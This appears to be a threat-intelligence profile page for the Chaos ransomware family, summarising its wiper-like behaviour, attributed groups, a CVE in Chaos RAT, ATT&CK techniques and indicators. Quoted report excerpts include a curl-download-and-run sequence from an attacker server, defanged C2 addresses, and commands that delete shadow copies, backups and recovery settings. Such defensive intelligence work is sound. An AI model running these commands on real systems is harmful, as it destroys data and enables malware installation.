Chaos ransomware is a builder-based Windows ransomware family first observed in June 2021. It has often functioned more destructively than conventional financially motivated ransomware: versions encrypt selected smaller files using AES with RSA-protected key material, while overwriting larger files with random data, frequently making recovery impossible regardless of ransom payment. Variants can enumerate drives, target configured file extensions, create ransom notes, alter the desktop wallpaper, establish persistence, delete Volume Shadow Copies and backup catalogs, and disable Windows recovery features. Early versions also included propagation across drives. Chaos-derived families include Yashma and BlackSnake. A Chaos variant was deployed through fake Grand Theft Auto VI downloads promoted with SEO poisoning and gaming-themed lures; in that campaign it operated as a wiper, encrypting smaller files and irreversibly destroying larger ones. MuddyWater has also used Chaos ransomware branding as a false flag to disguise espionage activity, rather than as evidence that the group operates the ransomware family.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The affected package is github.com/tiagorlampert/CHAOS v5.0.1; the referenced exploit is described as "Chaos RAT XSS to RCE."
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
MuddyWater, a hacking and cyber espionage group associated with Iran’s Ministry of Intelligence and Security, posed as the Chaos ransomware group to hide its espionage activity.
Dans plusieurs incidents, l’accès établi a été exploité pour déployer le ransomware Chaos, combinant exfiltration de données et chiffrement.
While the Chaos ransomware variant copied itself to $ user \ $ appdata \ cmd . exe and launched a new process, the new process in turn created a new file in the startup folder.
We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files.
The CyberVolk collective is a prime example of how readily threat actors can access and deploy dangerous ransomware builders such as AzzaSec, Diamond, LockBit, Chaos and others.
A newly emerged ransomware-as-a-service (RaaS) gang called Chaos is likely made up of former members of the BlackSuit crew... Chaos, which sprang forth in February 2025...
39 distinct techniques documented for this family, organized by ATT&CK tactic.
Ransomware operators continued to rely on a consistent set of Tactics, Techniques, and Procedures (TTPs), including exploitation of internet-facing edge devices and remote management tooling, abuse of valid accounts, credential theft.
Version 1.0; released on 9 June 2021: Replaces file data with random bytes and then encodes it with Base-64. From the outset, it has worming capability, distributing itself to all drives.
the winning vulnerability (Chaos) has been aggressively used to target Uyghurs
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 2 Execution (TA0002) T1106: Native API T1059.003: Windows Command Shell
This, in turn, initiates several shell commands: curl ... chmod 777 ... ./7c49006c2e417f20c732409ead2d6cc0. ... rm -rf ...
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 2 Execution (TA0002) T1106: Native API
In Darktrace’s honeypot environment, the Hadoop instance is intentionally misconfigured to allow attackers to achieve remote code execution on the service. The attack began when a threat actor sent a request to an endpoint on the Hadoop deployment to create a new application.
Ransomware operators continued to rely on a consistent set of Tactics, Techniques, and Procedures (TTPs), including exploitation of internet-facing edge devices and remote management tooling, abuse of valid accounts, credential theft.
Cross Site Scripting vulnerability in tiagorlampert CHAOS v.5.0.1 allows a remote attacker to escalate privileges via the sendCommandHandler function in the handler.go component.
Ransomware operators continued to rely on a consistent set of Tactics, Techniques, and Procedures (TTPs), including exploitation of internet-facing edge devices and remote management tooling, abuse of valid accounts, credential theft.
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 4 Defensive Evasion (TA0005) T1027: Obfuscated Files or Information
If not already running, it drops a copy at the below location and then executes itself. “C:\Users\\AppData\Roaming\svchost.exe”
rm -rf 7c49006c2e417f20c732409ead2d6cc0. - deletes the malware file from the disk to reduce traces of activity.
Post-compromise activity frequently involved disabling endpoint security tools and harvesting credentials stored in browsers before ransomware deployment.
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 1 Discovery (TA0007) T1016: System Network Configuration Discovery
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 1 Discovery (TA0007) T1016: System Network Configuration Discovery T1083: File and Directory Discovery T1135: Network Share Discovery T1049: System Network Connections Discovery
Embedded C2s: quanquandd[.]top:8888 linuxddos[.]net:2323 ai.nqb001[.]com:7812 tomca1[.]com:10099 ... Staging C2s (September 2022) 154.211.21[.]221 154.19.202[.]14 ...
When the malware receives a StartProxy command from the command-and-control (C2) server, it will begin listening on an attacker-controlled TCP port and operates as a SOCKS5 proxy.
Examples include 'Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES,' 'Winnti for Linux has used a custom TCP protocol with four-byte XOR for command and control,' and 'XCSSET uses RC4 encryption over TCP to communicate with its C2 server.'
curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0. - downloads a file from the attacker’s server, in this case a Chaos agent malware executable.
Multiple groups gained access by contacting employees via Microsoft Teams, posing as internal IT support, then guiding the target through a screen-sharing session to install a Remote Monitoring and Management (RMM) tool, such as AnyDesk/QuickAssist, or to execute a delivered payload.
Dans plusieurs incidents, l’accès établi a été exploité pour déployer le ransomware Chaos , combinant exfiltration de données et chiffrement.
Unlike most ransomware, wipers overwrite or remove the data from the victim’s systems... In our analysis we have seen Chaos encrypting files of less than 2 MB but overwriting larger files with random bytes. Because of this behavior, we believe it is more accurate to call it a wiper.
Этот крипто-вымогатель шифрует данные пользователей с помощью AES (режим GCM или похожий) + RSA-2048... К зашифрованным файлам добавляется расширение: .Void
TTPs based on MITRE ATT&CK Framework: Sr No. Tactic Technique 6 Impact (TA0040) T1486: Data Encrypted for impact T1489: Service Stop
The ransomware deletes the shadow copies and backup, while also disabling the recovery mode and task manager. vssadmin delete shadows /all /quiet & wmic shadowcopy delete bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no wbadmin delete catalog -quiet
268 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
88 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Chaos ransomware variant used destructively as a wiper. With administrator privileges, it removes shadow-copy backups, disables Windows recovery options, encrypts files smaller than 200 MB, overwrites larger files with random data, targets user and OneDrive folders, and leaves a non-functional ransom note.
Ransomware repurposed as a destructive wiper. When executed with administrator privileges, it deletes shadow copies, disables recovery, modifies boot configuration, encrypts files up to 200 MB using AES with a random extension, and overwrites larger files with random data. It leaves read_it.txt ransom notes but does not appear intended to support payment or recovery.
CHAOS (Chaos RAT) is a remote-access trojan. In this reference, version 5.0.1 is affected by CVE-2024-31839, a cross-site-scripting flaw in the sendCommandHandler function of handler.go that can allow remote privilege escalation and is referenced by an XSS-to-RCE exploit.
Referenced as prior malware that abused Chrome DevTools Protocol to hide command-and-control communications.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.